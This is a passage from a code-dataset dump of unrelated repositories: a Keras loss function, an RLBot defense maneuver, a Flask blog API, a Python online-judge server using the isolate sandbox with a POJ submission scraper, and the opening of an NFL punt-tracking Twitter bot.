regression_diff = regression - regression_target
regression_diff = keras.backend.abs(regression_diff)
regression_loss = backend.where(
keras.backend.less(regression_diff, 1.0 / sigma_squared),
0.5 * sigma_squared * keras.backend.pow(regression_diff, 2),
regression_diff - 0.5 / sigma_squared
)
# compute the normalizer: the number of positive anchors
normalizer = keras.backend.maximum(1, keras.backend.shape(indices)[0])
normalizer = keras.backend.cast(normalizer, dtype=keras.backend.floatx())
return keras.backend.sum(regression_loss) / normalizer
return _smooth_l1
def choose():
    def _choose(y_true, y_pred):
        ...
``` |
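The piecewise definition inside `_smooth_l1` switches from a quadratic to a linear penalty at |x| = 1/sigma^2. A small NumPy restatement of just that formula, handy for checking values by hand (a sketch, not part of the original module):

```python
import numpy as np

def smooth_l1_reference(diff, sigma=3.0):
    # mirrors the piecewise formula used in _smooth_l1 above
    sigma_squared = sigma ** 2
    diff = np.abs(diff)
    return np.where(diff < 1.0 / sigma_squared,
                    0.5 * sigma_squared * diff ** 2,
                    diff - 0.5 / sigma_squared)

print(smooth_l1_reference(np.array([0.05, 0.5])))  # approx. [0.01125, 0.44444]
```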
{
"source": "joey676/RLBotPack",
"score": 3
} |
#### File: source/maneuvers/shadow_defense.py
```python
from maneuvers.kit import *
from maneuvers.driving.travel import Travel
from maneuvers.driving.stop import Stop
from maneuvers.driving.drive import Drive
class ShadowDefense(Maneuver):
def __init__(self, car: Car, info: GameInfo, face_target: vec3, distance_from_target: float):
super().__init__(car)
self.info = info
self.face_target = face_target
ball = info.ball
dist = min(distance_from_target, ground_distance(face_target, self.info.my_goal.center) - 50)
target_pos = ground(face_target) + ground_direction(face_target, self.info.my_goal.center) * dist
side_shift = distance_from_target / 4 if ground_distance(car, info.my_goal.center) > 2500 else 400
points = [target_pos + vec3(side_shift, 0, 0), target_pos - vec3(side_shift, 0, 0)]
target_pos = nearest_point(car.pos, points)
self.target = Arena.clamp(target_pos, 700)
self.travel = Travel(car, self.target)
self.drive = Drive(car)
self.start_time = car.time
self.wait = Stop(car)
def step(self, dt):
ball = self.info.ball
if (
distance(self.car, ball) < 1000
and align(self.car.pos, ball, self.info.my_goal.center) > 0.2
):
shift = normalize(cross(direction(ball, self.car), vec3(0, 0, 1))) * 1000
self.travel.target = nearest_point(self.car.pos, [ball.pos + shift, ball.pos - shift])
else:
self.travel.target = self.target
self.travel.step(dt)
self.controls = self.travel.controls
if self.travel.finished:
if angle_to(self.car, self.face_target) > 0.3:
self.drive.target_pos = self.face_target
self.drive.step(dt)
self.drive.target_speed = 700
self.drive.controls.handbrake = False
self.controls = self.drive.controls
else:
self.wait.step(dt)
self.controls = self.wait.controls
self.finished = self.travel._driving and self.car.time > self.start_time + 0.5
def render(self, draw: DrawingTool):
self.travel.render(draw)
``` |
{
"source": "joeyabouharb/flask-blogger",
"score": 3
} |
#### File: server/blueprints/index.py
```python
from flask import Blueprint, request, jsonify
from flask_jwt_extended import create_access_token
from server.models import DB
from server.models.User import User
from bcrypt import checkpw, hashpw, gensalt
INDEX_BLUEPRINT = Blueprint('Index', __name__, url_prefix='/api/v1')
@INDEX_BLUEPRINT.route('/register', methods=['POST'])
def register_user():
email = request.json['email']
is_already_registered = User.query.filter_by(email=email).first()
if is_already_registered:
return jsonify(message='This author already registered.'), 409
else:
name = request.json['name']
        password = request.json['password'].encode('utf-8')
        password = hashpw(password, gensalt())
user = User(name=name, email=email, password=password)
DB.session.add(user)
DB.session.commit()
return jsonify(message='New author added to the blog!'), 201
@INDEX_BLUEPRINT.route('/login', methods=['POST'])
def login():
"""Login can accept JSON credentials
Returns:
JSON (access_token, message)
"""
if request.is_json:
email = request.json['email']
password = request.json['password']
else:
email = request.form['email']
password = request.form['password']
    user = User.query.filter_by(email=email).first()
    if not user:
        return jsonify(message="Can't be verified at this time"), 401
    hash_password = user.password
    is_verified_user = checkpw(password.encode('utf-8'), hash_password)
if is_verified_user:
access_token = create_access_token(identity=email)
return jsonify(message="Successful login", access_token=access_token)
else:
return jsonify(message="Can't be verified at this time"), 401
```
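Assuming the blueprint is mounted as above, registration and login can be exercised with a short client script (the base URL is a local-development assumption):

```python
import requests

BASE = 'http://localhost:5000/api/v1'   # assumed local dev address

# register a new author
requests.post(BASE + '/register', json={
    'name': 'Jane', 'email': 'jane@example.com', 'password': 'hunter2'})

# log in and keep the JWT for later requests
resp = requests.post(BASE + '/login', json={
    'email': 'jane@example.com', 'password': 'hunter2'})
token = resp.json().get('access_token')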
#### File: server/blueprints/posts.py
```python
from math import ceil
from flask import Blueprint, jsonify, request
from flask_jwt_extended import jwt_required
from server.models import DB
from server.models.Post import Post, posts_schema, post_schema
POSTS_BLUEPRINT = Blueprint('Posts', __name__, url_prefix='/api/v1/posts')
@POSTS_BLUEPRINT.route('/', methods=['GET'])
def display_blog_posts():
page = int(request.args.get('page', '1'))
start = (page - 1) * 6
end = page * 6
blog = Post.query.all()
result = posts_schema.dump(blog)
pages = ceil(len(result) / 6)
print(pages)
page = result[start:end]
return jsonify(
{
"result": page,
"pageNo": pages
}
)
@POSTS_BLUEPRINT.route('/<int:post_id>', methods=['GET'])
def display_single_post(post_id: int):
post = Post.query.filter_by(post_id=post_id).first()
if post:
result = post_schema.dump(post)
return jsonify(result)
else:
return jsonify(message="Post does not exist"), 404
@POSTS_BLUEPRINT.route('/', methods=['POST'])
@jwt_required
def make_new_blog_post():
"""Accepts form data and creates new database record in blog-post table
Use Bearer Token in the Postman Authorization tab, take the
access token returned from '/login' route and inject.
JWT is currently broken after ROUTE changes---------fix later
Requires:
JWT authorization
"""
content = request.json.get('content', '').replace('\n', '')
if not content:
return jsonify(message="no content created"), 400
new_post = Post(content=content)
DB.session.add(new_post)
DB.session.commit()
return jsonify(message="New blog post created"), 201
@POSTS_BLUEPRINT.route('/', methods=['PUT'])
def update_post():
post_id = int(request.json['post_id'])
post = Post.query.filter_by(post_id=post_id).first()
if post:
post.title = request.json['title']
post.content = request.json['content']
DB.session.commit()
return jsonify(message="Post updated!"), 202
else:
return jsonify(message="No post with that ID"), 404
@POSTS_BLUEPRINT.route('/<int:post_id>', methods=['DELETE'])
def delete_post(post_id: int):
"""Delete the record from database posts table
Just enter the blog-post number into Postman with a DELETE request:
./delete-post/66
Arguments:
post_id: int: takes the argument from the URL
Returns:
message and status code in JSON
"""
post = Post.query.filter_by(post_id=post_id).first()
if post:
DB.session.delete(post)
DB.session.commit()
return jsonify(message="You obliterated that post"), 202
else:
return jsonify(message="No post by that ID"), 404
```
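As written, only the POST route requires a JWT; a sketch of creating, listing and deleting a post with the token obtained from `/login` (URL and ids are placeholders):

```python
import requests

BASE = 'http://localhost:5000/api/v1/posts'      # assumed local dev address
headers = {'Authorization': 'Bearer ' + token}   # token from the /login sketch above

requests.post(BASE + '/', json={'content': 'Hello, blog!'}, headers=headers)
print(requests.get(BASE + '/?page=1').json())    # paginated listing, 6 posts per page
requests.delete(BASE + '/1')                     # delete post with id 1 (no JWT required here)
```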
#### File: flask-blogger/server/__init__.py
```python
from flask import Flask
from flask_cors import CORS
from os import path
from dotenv import find_dotenv, load_dotenv
from server.blueprints.index import INDEX_BLUEPRINT
from server.blueprints.posts import POSTS_BLUEPRINT
from server.models import DB, MA, JWT
def create_app():
"""
:return:
"""
load_dotenv(find_dotenv())
app = Flask(__name__)
CORS(app, resources={r"/api/*": {"origins": "*"}})
basedir = path.abspath(path.dirname(__file__))
try:
app.config.from_envvar('CONFIG')
except RuntimeError:
raise RuntimeError('NO Environment configured. Closing.')
DB.init_app(app)
JWT.init_app(app)
MA.init_app(app)
app.register_blueprint(INDEX_BLUEPRINT)
app.register_blueprint(POSTS_BLUEPRINT)
return app
``` |
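`create_app` reads its settings from the file pointed to by the CONFIG environment variable; a minimal sketch of launching the factory (the file name and the required settings listed in the comment are assumptions, not part of the repository):

```python
# run.py (hypothetical) -- CONFIG is assumed to point to a settings file that
# defines at least SQLALCHEMY_DATABASE_URI and a JWT secret key.
from server import create_app

app = create_app()

if __name__ == '__main__':
    app.run(debug=True)
```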
{
"source": "joeyac/JudgeServer",
"score": 2
} |
#### File: JudgeServer/server/oj_poj.py
```python
from utils import logger
from update_status import update_submission_status
from exception import VSubmitFailed, VLoginFailed
from bs4 import BeautifulSoup
import html5lib
import urllib, urllib2, cookielib
import time
class POJ:
# base information:
URL_HOME = 'http://poj.org/'
URL_LOGIN = URL_HOME + 'login?'
URL_SUBMIT = URL_HOME + 'submit?'
URL_STATUS = URL_HOME + 'status?'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116 Safari/537.36',
'Origin': "http://poj.org",
'Host': "poj.org",
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
}
# result
INFO = ['Run ID', 'User', 'Problem', 'Result', 'Memory', 'Time', 'Language', 'Code Length', 'Submit Time']
# map to compatible result
# vid v_run_id v_submit_time status time memory length language v_user
MAP = {
'Run ID': 'v_run_id',
'Submit Time': 'v_submit_time',
'Result': 'status',
'Problem': 'vid',
'Time': 'time',
'Memory': 'memory',
'Code Length': 'length',
'Language': 'language',
'User': 'v_user',
}
# language
LANGUAGE = {
'G++': '0',
'GCC': '1',
'JAVA': '2',
'PASCAL': '3',
'C++': '4',
'C': '5',
'FORTRAN': '6',
}
def __init__(self, user_id, password):
self.user_id = user_id
self.password = password
self.problem_id = ''
self.run_id = ''
        # create a CookieJar instance to hold the session cookies
        cookie = cookielib.CookieJar()
        # build a cookie handler with urllib2's HTTPCookieProcessor
        handler = urllib2.HTTPCookieProcessor(cookie)
        # build an opener from the handler
        self.opener = urllib2.build_opener(handler)
        # the opener's open() behaves like urllib2.urlopen and also accepts a Request object
def login(self):
try:
data = dict(
user_id1=self.user_id,
password1=<PASSWORD>,
B1='login',
url='.',
)
post_data = urllib.urlencode(data)
request = urllib2.Request(POJ.URL_LOGIN, post_data, POJ.headers)
response = self.opener.open(request, timeout=5).read()
if response.find('loginlog') > 0:
return True
else:
logger.info("login failed.")
return False
except Exception as e:
logger.error(e)
return False
def submit(self, problem_id, language, src_code):
try:
self.problem_id = problem_id
submit_data = dict(
problem_id=problem_id,
language=POJ.LANGUAGE[language.upper()],
source=src_code,
submit='Submit',
encoded='0',
)
self.problem_id = problem_id
post_data = urllib.urlencode(submit_data)
request = urllib2.Request(POJ.URL_SUBMIT, post_data, POJ.headers)
page = self.opener.open(request, timeout=5)
html = page.read()
if 'Error Occurred' in html:
return False
return True
except Exception as e:
logger.error(e)
return False
@staticmethod
def str2int(string):
if not string:
return 0
try:
return int(string[:-1])
except:
return int(string[:-2])
def result(self):
try:
url_data = {
'user_id': self.user_id,
'problem_id': self.problem_id
}
url = POJ.URL_STATUS + urllib.urlencode(url_data)
page = self.opener.open(url, timeout=5)
# sometimes you can not get the page
if not page:
return False, {}
soup = BeautifulSoup(page, 'html5lib')
table = soup.find('table', {'class': 'a'})
if not table:
return False, {}
table_body = table.find('tbody')
rows = table_body.find_all('tr')
data = []
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
data.append([ele for ele in cols]) # ! Get rid of empty values
if len(data) <= 1:
logger.warning('get result error!')
return False, {}
name = data[0]
latest = data[1]
if not self.run_id:
self.run_id = latest[0]
wait = ['running & judging','compiling','waiting']
res = {}
for i in range(9):
res[POJ.MAP[name[i]]] = str(latest[i]).lower()
res['time'] = self.str2int(res['time'])
res['memory'] = self.str2int(res['memory'])
for i in range(3):
if res['status'] == wait[i]:
return False, res
return True, res
except Exception as e:
logger.error(e)
return False, {}
def poj_submit(problem_id, language_name, src_code, ip=None, sid=None, username='USTBVJ', password='<PASSWORD>'):
poj = POJ(username, password)
if poj.login():
if poj.submit(problem_id, language_name, src_code):
status, result = poj.result()
while not status:
status, result = poj.result()
if result and ip:
update_submission_status(ip, sid, result['status'])
time.sleep(2)
return result
else:
info = 'POJ [{pid},{lang},{sid}] submit error.'.format(pid=problem_id, lang=language_name, sid=sid)
logger.exception(info)
raise VSubmitFailed(info)
else:
info = 'POJ [{user},{sid}] login failed.'.format(user=username, sid=sid)
logger.exception(info)
raise VLoginFailed(info)
if __name__ == '__main__':
pid = 1000
lang = 'g++'
src = '''
#include<iostream>
using namespace std;
int main()
{
int a,b;
while(cin>>a>>b)cout<<a-b<<endl;
return 0;
}
'''
print poj_submit(pid, lang, src)
```
#### File: JudgeServer/server/_runner.py
```python
from __future__ import unicode_literals
from config import JUDGE_DEFAULT_PATH, TEST_CASE_DIR, TEST_CASE_IN_DIR_NAME
from utils import get_meta_info
import os
import commands
# isolate -p --cg-mem 256000 --cg -i input.data --run -- /usr/lib/jvm/java-9-oracle/bin/java -cp exe Main
# isolate -M meta.data -m 262144 -t 1 -w 3 -x 1 -b 1 -k 262144 -o output.data -r error.data -v --run -- ./Main
# isolate --cg --run /usr/bin/python3 a.py
# isolate --cg [mem_limit,kb] [time_limit,s,fractions allowed] [wall_time_limit,s,fractions allowed]
# [extra_time] [box_id]
# [output_limit,kb] [process_limit] [in,out,error] --run -- [run_args] [exe_file]
# Return contract:
# a dict is returned: {'status': status_code_defined,
#                      'info': detail}
# detail:{'time': 0.000, (in seconds)
# 'time-wall': 0.035, (in seconds)
# 'max-rss': 1336, (in kilobytes)
# 'csw-voluntary': 3,
# 'csw-forced': 2,
# 'exitcode': 1 (optional)
# 'error': {string}
# }
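# For illustration only, a successful run might yield something like (hypothetical values):
# {'status': 0,
#  'info': {'time': 0.004, 'time-wall': 0.051, 'max-rss': 1336,
#           'csw-voluntary': 3, 'csw-forced': 2, 'exitcode': 0, 'error': ''}}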
class Runner(object):
RESULT = {
"success": 0,
"runtime_error": 1,
"time_limit_exceeded": 2,
"memory_limit_exceeded": 3,
"output_limit_exceeded": 4,
"system_error": 8,
"unknown_error": 8,
}
def __init__(self, max_cpu_time, max_real_time, max_memory, box_id,
max_output_size, max_process_number,
input_file, output_file, error_file, meta_file,
run_args,
input_file_dir=TEST_CASE_DIR,
group_memory=False
):
self.judge_dir = os.path.join(JUDGE_DEFAULT_PATH, box_id, 'box')
self.max_cpu_time = max_cpu_time
self.max_real_time = max_real_time
self.max_memory = max_memory * 3
self.box_id = box_id
self.max_output_size = max_output_size * 2
self.max_process_number = max_process_number
self.input_file = input_file
self.output_file = output_file
self.error_file = error_file
self.meta_file = meta_file
self.run_args = run_args
self.group_memory = group_memory
self.input_file_dir = input_file_dir
self.cmd_status = None
self.cmd_result = None
self.result = None
def get_result(self):
# meta file base:
# time:0.000
# time-wall:0.035
# max-rss:1336
# csw-voluntary:3
# csw-forced:2
result = {}
error = ''
error_file_path = os.path.join(JUDGE_DEFAULT_PATH, self.box_id, 'box', self.error_file)
if os.path.exists(error_file_path):
with open(error_file_path) as f:
error = f.read().strip()
        if self.cmd_status == 0 or self.cmd_status == 256:
meta = get_meta_info(self.meta_file)
result['info'] = meta
result['info']['error'] = error
if 'exitcode' not in result['info']:
result['info']['exitcode'] = 0
            output_file = os.path.join(self.judge_dir, self.output_file)
output_file_size = None
if os.path.exists(output_file):
output_file_size = float(os.path.getsize(output_file)) / 1024 # KB
if output_file_size and output_file_size > self.max_output_size / 2:
result['status'] = Runner.RESULT['output_limit_exceeded']
if 'OK' in self.cmd_result:
if meta['max-rss'] > self.max_memory / 3:
result['status'] = Runner.RESULT['memory_limit_exceeded']
else:
result['status'] = Runner.RESULT['success']
else:
if meta['status'] == 'TO':
result['status'] = Runner.RESULT['time_limit_exceeded']
elif meta['status'] == 'SG':
result['status'] = Runner.RESULT['runtime_error']
elif meta['status'] == 'RE':
result['status'] = Runner.RESULT['runtime_error']
                else:  # meta['status'] == 'XX' - internal error of the sandbox
result['status'] = Runner.RESULT['system_error']
else:
result['status'] = Runner.RESULT['unknown_error']
result['info']['error'] = error
self.result = result
def run(self):
# Enable use of control groups.
cmd = 'isolate --cg'
# special sandbox id for used in parallel
cmd += ' -b ' + str(self.box_id)
# bind input data dir
cmd += ' --dir=' + TEST_CASE_IN_DIR_NAME + '=' + str(self.input_file_dir)
# Inherit all environment variables from the parent.
cmd += ' -e'
# memory limit like this because of JVM will create a process
if self.group_memory:
cmd += ' --cg-mem ' + str(self.max_memory) # total memory limit
else:
cmd += ' -m ' + str(self.max_memory) # every process memory limit
cmd += ' -t ' + str(self.max_cpu_time)
cmd += ' -w ' + str(self.max_real_time)
# set extra time to report real execution time
cmd += ' -x ' + str(1)
if self.input_file:
cmd += ' -i ' + os.path.join('/' + TEST_CASE_IN_DIR_NAME, self.input_file).encode("utf-8")
cmd += ' -o ' + str(self.output_file)
cmd += ' -r ' + str(self.error_file)
cmd += ' -M ' + os.path.join(self.judge_dir, str(self.meta_file)).encode("utf-8")
# cmd += ' -f ' + str(self.max_output_size)
# Permit the program to create up to max processes and/or threads.
cmd += ' -p'
if self.max_process_number and self.max_process_number >= 1:
cmd += '=' + str(self.max_process_number)
cmd += ' --run -- '
run_args = str(self.run_args)
cmd += str(run_args)
status, result = commands.getstatusoutput(cmd)
self.cmd_status = status
self.cmd_result = result
self.get_result()
# return status, result
# print status
# print result
# return status
# return time memory
```
#### File: JudgeServer/server/test.py
```python
import os
import hashlib
import json
import sys
sys.path.append("..")
# s=os.path.join('test')
# print s
# print os.getcwd()
from client.languages import cpp_lang_config, c_lang_config, java_lang_config
from config import BASE_PATH, JUDGE_DEFAULT_PATH, TEST_CASE_DIR
from exception import JudgeServerError
import commands
def interpret(val):
try:
return int(val)
except ValueError:
try:
return float(val)
except ValueError:
return val
def TT():
def get_file_info():
try:
result = {}
with open(os.path.join(BASE_PATH, "meta.data")) as f:
for line in f:
name, var = line.partition(':')[::2]
result[name.strip()] = interpret(var.strip())
return result
except IOError:
raise JudgeServerError("Test case not found")
except ValueError:
raise JudgeServerError("Bad test case config")
x = get_file_info()
if x['csw-forced']==45:
print 'fuck u'
for a, b in x.iteritems():
print a+"___"+str(b)
def get_hash():
x = 'a+b problem'
token = hashlib.sha256(x).hexdigest()
# 9386c61e9a8001efa9fc4f875410419fa42f4eff9c13c3ed81382514518ce157
print token
def test():
from compiler import Compiler
box_id = 0
src_name = 'a.c'
src_path = src_name # except meta file other are all relative path
com = Compiler(cpp_lang_config['compile'], str(box_id))
print com.compile
# isolate --cg -b 0 -e -r errorc.data --cg-mem 300000 -M meta.out --processes --run -- /usr/bin/g++ -O2 -w -std=c++11 a.cpp -lm -o a.o
# isolate --cg -b 0 -e --dir=data/=/home/rhyme/code/USTBJudgeServer/JudgeServer/server/test_case/a
# -i data/1.in -o out.out -r error.out -m 10240 -M meta.out --processes --run -- a.o
# TT()
# print ''
# test()
#
def _load_test_case_info():
try:
with open(os.path.join(TEST_CASE_DIR, 'a', "info")) as f:
return json.loads(f.read())
except IOError:
raise JudgeServerError("Test case not found")
except ValueError:
raise JudgeServerError("Bad test case config")
x = _load_test_case_info()
# count = x['count']
# for i in range(1,count+1):
# print x[str(i)]
for test_case_file_id, _ in x.iteritems():
print test_case_file_id
print _
print 'down'
def dev_test():
cmd1 = 'g++ /var/local/lib/isolate/3/box/a.cpp -w -std=c++11 -lm -o /var/local/lib/isolate/3/box/a.o'
cmd2 = 'isolate -b 3 --cg -p -t 3 -m 30240 -f 1 ' \
'-M run.meta -r run.error -i data.in -o run.out -v -v -v --run -- ./a.o'
cmd3 = 'isolate -b 3 -t 3 -m 40240 -f 1 ' \
'-M run.meta -r run.error -i data.in -o run.out -v -v -v --run -- ./a.o'
(status, result) = commands.getstatusoutput(cmd1)
print status, result
x = raw_input('press enter to continue...')
(status, result) = commands.getstatusoutput(cmd2)
print status, result
x = raw_input('press enter to continue...')
(status, result) = commands.getstatusoutput(cmd3)
print status, result
x = raw_input('press enter to continue...')
def rm_box():
cmd = 'isolate -b {box_id} --cleanup'
for id in range(1,27):
run = cmd.format(box_id=id)
        status, result = commands.getstatusoutput(run)
print result, id
# _load_test_case_info()
rm_box()
```
#### File: JudgeServer/server/update_status.py
```python
from utils import web_server_token, logger
import psutil
from threading import Thread
import Queue
import requests
class StatusWorker(Thread):
def __init__(self, queue):
self.queue = queue
super(StatusWorker, self).__init__()
def run(self):
while True:
address, sid, status = self.queue.get()
url = 'http://{adr}/api/submission/update/'.format(adr=address)
headers = {"Content-Type": "application/json"}
data = {
                'token': web_server_token,
'result': status,
'submission_id': sid,
}
try:
info = requests.post(url, headers=headers, json=data, timeout=2).json()
logger.info(str(info))
except Exception as e:
logger.exception(e)
finally:
self.queue.task_done()
cpu_count = psutil.cpu_count()
que = Queue.Queue()
for cnt in range(cpu_count):
worker = StatusWorker(que)
worker.daemon = True
worker.start()
logger.info('init update status env.')
def update_submission_status(address, sid, status):
# print address, sid, status
que.put([address, sid, status])
```
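The worker pool above drains the queue asynchronously, so callers simply enqueue an update and move on. A minimal sketch of a judge loop reporting progress (the address, submission id and status strings are hypothetical):

```python
from update_status import update_submission_status

# non-blocking: the enqueued update is POSTed by one of the background workers
update_submission_status('192.168.0.10:8080', 12345, 'compiling')
update_submission_status('192.168.0.10:8080', 12345, 'accepted')
```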
#### File: JudgeServer/server/utils.py
```python
from __future__ import unicode_literals, with_statement
import commands
import hashlib
import logging
import os
import shutil
import signal
import socket
from contextlib import contextmanager
from logging.handlers import RotatingFileHandler
import psutil
from config import REMOTE_DEBUG
from config import TOKEN_FILE_PATH, JUDGE_DEFAULT_PATH, DEBUG
from exception import SandboxError,JudgeServerError
logFile='/log/judge.log'
my_handler = RotatingFileHandler(logFile, mode='a', maxBytes=5*1024*1024,
backupCount=2, encoding=None, delay=0)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d]'
' [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s',
datefmt='%m-%d %H:%M',
filename='/log/judge.log',
filemode='w',
)
logging.getLogger('').addHandler(my_handler)
if REMOTE_DEBUG:
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)s: %(asctime)s [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
# Now, we can log to the root logger, or any other logger. First the root...
logger = logging
# http://stackoverflow.com/questions/366682/how-to-limit-execution-time-of-a-function-call-in-python
class TimeoutException(Exception):
pass
@contextmanager
def time_limit(seconds):
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try:
yield
finally:
signal.alarm(0)
def server_info():
cmd = 'isolate --version'
(exit_status, out_text) = commands.getstatusoutput(cmd)
if exit_status != 0:
raise SandboxError("isolate(https://github.com/ioi/isolate) not found or error")
return {"hostname": socket.gethostname(),
"cpu": psutil.cpu_percent(),
"cpu_core": psutil.cpu_count(),
"memory": psutil.virtual_memory().percent,
"judger_version": out_text,
}
def get_token():
try:
with open(TOKEN_FILE_PATH, "r") as f:
return f.read().strip()
except IOError:
raise JudgeServerError("token.txt not found")
def interpret(val):
try:
return int(val)
except ValueError:
try:
return float(val)
except ValueError:
return val
def get_meta_info(file_path):
try:
result = {}
with open(file_path) as f:
for line in f:
name, var = line.partition(':')[::2]
result[name.strip()] = interpret(var.strip())
return result
except IOError:
raise JudgeServerError("meta file not found")
except ValueError:
raise JudgeServerError("Bad meta file config")
def replace_blank(string):
return string.replace('\t', '').replace('\n', '').replace(' ', '')
def choose_box_id():
for box_id in range(100):
path = os.path.join(JUDGE_DEFAULT_PATH, str(box_id))
if not os.path.exists(path):
return str(box_id)
return None
class InitIsolateEnv(object):
def __init__(self):
self.box_id = choose_box_id()
def __enter__(self):
if not self.box_id:
raise JudgeServerError("failed to get box id")
try:
cmd = 'isolate -b {box_id} --cg --init'
cmd = cmd.format(box_id=self.box_id)
status, result = commands.getstatusoutput(cmd)
if DEBUG:
print cmd
if status != 0:
raise JudgeServerError("failed to create runtime dir")
except Exception as e:
logger.exception(e)
raise JudgeServerError("failed to create runtime dir")
return self.box_id
def __exit__(self, exc_type, exc_val, exc_tb):
try:
cmd = 'isolate -b {box_id} --cleanup'
cmd = cmd.format(box_id=self.box_id)
status, result = commands.getstatusoutput(cmd)
path = os.path.join(JUDGE_DEFAULT_PATH, self.box_id) # prevent for unclean
if os.path.exists(path):
shutil.rmtree(path)
if DEBUG:
print cmd, status
if os.path.exists(path):
raise JudgeServerError("failed to clean runtime dir")
except Exception as e:
logger.exception(e)
raise JudgeServerError("failed to clean runtime dir")
def get_dir_hash(directory):
import checksumdir
if os.path.exists(directory):
return checksumdir.dirhash(directory, 'sha256')
else:
return -1
token = hashlib.sha256(get_token()).hexdigest()
web_server_token = '<PASSWORD>'
if __name__ == '__main__':
# while True:
# logger.info('data')
print get_dir_hash(os.path.join(os.getcwd(), 'test_case', 'a'))
``` |
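Two of the helpers above are context managers; a short usage sketch (the judging calls are placeholders, not functions from this module):

```python
from utils import time_limit, TimeoutException, InitIsolateEnv, logger

try:
    with time_limit(2):
        run_heavy_check()            # hypothetical long-running call
except TimeoutException:
    logger.warning('check timed out')

with InitIsolateEnv() as box_id:
    # a fresh isolate sandbox id; the box is cleaned up when the block exits
    judge_in_box(box_id)             # hypothetical
```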
{
"source": "joeyagreco/Surrender-Index",
"score": 3
} |
#### File: joeyagreco/Surrender-Index/surrender_index_bot.py
```python
import argparse
from base64 import urlsafe_b64encode
import chromedriver_autoinstaller
from datetime import datetime, timedelta, timezone
from dateutil import parser, tz
from email.mime.text import MIMEText
import espn_scraper as espn
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import json
import numpy as np
import os
import pickle
import scipy.stats as stats
from selenium import webdriver
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import StaleElementReferenceException
from subprocess import Popen, PIPE
import sys
import threading
import time
import tweepy
from twilio.rest import Client
import traceback
# A dictionary of plays that have already been tweeted.
tweeted_plays = None
# A dictionary of the currently active games.
games = {}
# The authenticated Tweepy APIs.
api, ninety_api = None, None
# NPArray of historical surrender indices.
historical_surrender_indices = None
# Whether the bot should tweet out any punts
should_tweet = True
### SELENIUM FUNCTIONS ###
def get_game_driver(headless=True):
global debug
global not_headless
options = webdriver.ChromeOptions()
if headless and not debug and not not_headless:
options.add_argument("headless")
return webdriver.Chrome(options=options)
def get_twitter_driver(link, headless=False):
with open('credentials.json', 'r') as f:
        credentials = json.load(f)
        email = credentials['cancel_email']
        username = credentials['cancel_username']
        password = credentials['cancel_password']
driver = get_game_driver(headless=headless)
driver.implicitly_wait(60)
driver.get(link)
driver.find_element_by_xpath("//div[@aria-label='Reply']").click()
time.sleep(1)
login_button = driver.find_element_by_xpath("//a[@data-testid='login']")
time.sleep(1)
driver.execute_script("arguments[0].click();", login_button)
email_field = driver.find_element_by_xpath(
"//input[@name='session[username_or_email]']")
password_field = driver.find_element_by_xpath(
"//input[@name='session[password]']")
email_field.send_keys(email)
password_field.send_keys(password)
driver.find_element_by_xpath(
"//div[@data-testid='LoginForm_Login_Button']").click()
time.sleep(1)
if 'email_disabled=true' in driver.current_url:
username_field = driver.find_element_by_xpath(
"//input[@name='session[username_or_email]']")
password_field = driver.find_element_by_xpath(
"//input[@name='session[password]']")
username_field.send_keys(username)
password_field.send_keys(password)
driver.find_element_by_xpath(
"//div[@data-testid='LoginForm_Login_Button']").click()
return driver
def get_inner_html_of_element(element):
return element.get_attribute("innerHTML")
def get_inner_html_of_elements(elements):
return list(map(get_inner_html_of_element, elements))
def construct_play_from_element(element):
title = get_inner_html_of_element(element.find_element_by_tag_name("h3"))
desc = get_inner_html_of_element(
element.find_element_by_tag_name("p").find_element_by_tag_name("span"))
desc = desc.lstrip().rstrip()
play = {}
if len(title) > 5:
down_dist, yrdln = title.split("at")
play['yard_line'] = yrdln.lstrip(" ")
play['down'] = down_dist[:3]
play['dist'] = down_dist.rstrip(" ").split(" ")[-1]
if 'goal' in play['dist'].lower():
play['dist'] = play['yard_line'].split(" ")[1]
start_index = desc.find("(") + 1
end_index = desc.find(")")
time_qtr = desc[start_index:end_index]
play['time'] = time_qtr.split("-")[0].rstrip(" ")
play['qtr'] = time_qtr.split("-")[1].lstrip(" ")
play['text'] = desc[end_index + 1:].lstrip(" ")
return play
def get_plays_from_drive(drive, game):
all_plays = drive.find_elements_by_tag_name("li")
good_plays = []
if is_final(game):
relevant_plays = all_plays[-3:]
else:
relevant_plays = all_plays[:3]
for play in relevant_plays:
if play.get_attribute("class") == '' or play.get_attribute(
"class") == 'video':
play_dct = construct_play_from_element(play)
if 'yard_line' in play_dct:
good_plays.append(play_dct)
return good_plays
def get_all_drives(game):
all_drives = game.find_elements_by_class_name("drive-list")
for drive in all_drives:
accordion_content = drive.find_element_by_xpath(
'..').find_element_by_xpath('..')
if "in" not in accordion_content.get_attribute("class"):
accordion_content.find_element_by_xpath('..').click()
time.sleep(0.5)
return all_drives
### POSSESSION DETERMINATION FUNCTIONS ###
def get_possessing_team_from_play_roster(play, game):
global punters
home, away = get_home_team(game), get_away_team(game)
home_punters, away_punters = punters[home], punters[away]
home_possession, away_possession = False, False
for home_punter in home_punters:
if home_punter in play['text']:
home_possession = True
for away_punter in away_punters:
if away_punter in play['text']:
away_possession = True
if home_possession == away_possession:
return ''
else:
return home if home_possession else away
def get_possessing_team_from_punt_distance(play, game):
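    # Heuristic: infer the punting team from the punt distance relative to the spot of the kick;
    # a punt longer than the distance to the goal line was almost certainly kicked from the
    # named team's own side of the field.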
try:
split = play['text'].split(" ")
if split[1] == 'punts':
if int(split[2]) > int(play['yard_line'].split(" ")[1]):
return play['yard_line'].split(" ")[0]
if 'touchback' in play['text'].lower():
punt_distance = int(split[2])
